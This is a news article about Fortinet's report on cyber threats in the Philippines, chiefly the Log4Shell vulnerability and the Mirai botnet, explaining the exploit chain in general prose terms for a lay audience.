Connect with us

Hi, what are you looking for?

HEADLINES

Phl continues to experience cyber threats – Fortinet

Fortinet shared that a zero-day vulnerability officially labeled as CVE-2021-44228 or popularly known as log4Shell was discovered in the Apache software, the maker of log4j. It has the potential for a wide-scale impact across most Java applications, including business systems that record log information.

Photo by Dan Nelson from Unsplash.com

The Philippines continues to experience cyber threats that can pose a problem on the Internet, applications and devices during the first quarter of the year. 

Fortinet shared that a zero-day vulnerability officially labeled as CVE-2021-44228 or popularly known as log4Shell was discovered in the Apache software, the maker of log4j. It has the potential for a wide-scale impact across most Java applications, including business systems that record log information. This zero-day exploit, which was first discovered on December 9, 2021 in the Java logging library log4j (version 2), was one of the most detected exploitation techniques in the Philippines.

This vulnerability should be taken seriously as this is trivial to exploit or easy to perform but it could permit a remote attacker to execute a complete remote code execution (RCE) on vulnerable systems when exploited. The ubiquitous nature of Log4j is part of what makes CVE-2021-44228 so dangerous. Millions of applications such as iCloud, Steam, an Minecraft, use Log4j for logging. An attacker simply needs to get the app to log a special string to successfully exploit this vulnerability. So far, these cloud services and applications have all been found vulnerable.

Fortinet describes how the exploit work. Once a target has been selected, an attacker adds a JNDI query to a connection request to that target in a field that likely to get logged via Log4j. A vulnerable version of Log4j then takes that request and attempts to contact ‘malicious-server host’ with an LDAP query. Should the connection be successful, the ‘malicious-server hosts’ under the attackers control replies to the query by inserting a malicious Java class file location into the directory data. The Java implementation on the target then downloads the malicious Java class file and executes it.

Advertisement. Scroll to continue reading.

The log4Shell can potentially compromise millions of devices across the Internet. In light of this, FortiGuard Labs released the IPS signature “Apache Log4j Error Log Remote Code Execution” to detect and mitigate exploit attempts, which was initially released in the IPS version 19.215 package.

 The second vulnerability, labeled CVE-2021-45046 causes a Denial of Service (DoS) condition when successfully exploited. Threat actors wasted no time in leveraging Log4Shell by deploying new malware and potentially unwanted programs (PUPs) to compromise vulnerable machines. It was revealed that an information leak and remote code execution in some environments and local code execution in all environments could be achieved due to successful exploitation.

In addition, a considerable increase in massive scans was detected, which allows an adversary to identify services in the target system and carry out further attack based on their findings. Adversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols. FortiLabs also detected many attacks related to Remote Code Execution on IoT devices and home routers which allow the adversary to gain control over vulnerable systems.

Meanwhile, Mirai continues to be the Botnet campaign that registers the most activity in the Philippines. Mirai is a Linux IoT malware that causes infected machines to join a botnet (T1584 005) [16] used for Distributed Denial of Service (DDoS) attacks. However, FortiLabs is aware of a new variant of Mirai Linux spreading using the CVE-2021-44228 vulnerability known as Log4Shell. This is possibly the first Mirai variant equipped with embedded Log4Shell exploit code along with a Mirai variant as the vulnerability was disclosed on December 9, 2021.

Advertisement. Scroll to continue reading.
Advertisement
Advertisement
Advertisement

Like Us On Facebook

You May Also Like

HEADLINES

In rigorous evaluations conducted by prestigious cybersecurity testing organizations, Kaspersky Plus (starting in Q4 2024, Kaspersky Premium), Kaspersky Endpoint Security for Business (KESB), and...

HEADLINES

"Given the Philippines' high exposure to cyber threats, it's important for both individuals and businesses to stay vigilant," said Adrian Hia, Managing Director for...

White Papers

When compared to 2023, Sophos saw a 51% increase in abusing “Living off the Land” binaries or LOLbins; since 2021, it’s increased by 83%.

HEADLINES

Someone illegally acquires or uses personal information such as bank account or credit card numbers of another person to obtain money, goods or services....

HEADLINES

The partnership enables MCU to integrate Fortinet’s Network Security Expert (NSE) training and certification program into its academic offerings, either as part of the curriculum or...

HEADLINES

To stay ahead of these challenges, organizations need to invest in AI-driven defenses, transition to quantum-safe encryption, and adopt a Zero Trust approach to...

HEADLINES

There was a 121% Year-on-Year (YoY) increase in identity fraud in 2024 across the region, with significant surges recorded in Singapore (207%), Thailand (206%)...

HEADLINES

As part of RCBC’s 2024 Cybersecurity literacy program, the webinar aims to help Filipinos level up their online banking safety by providing them with...

Advertisement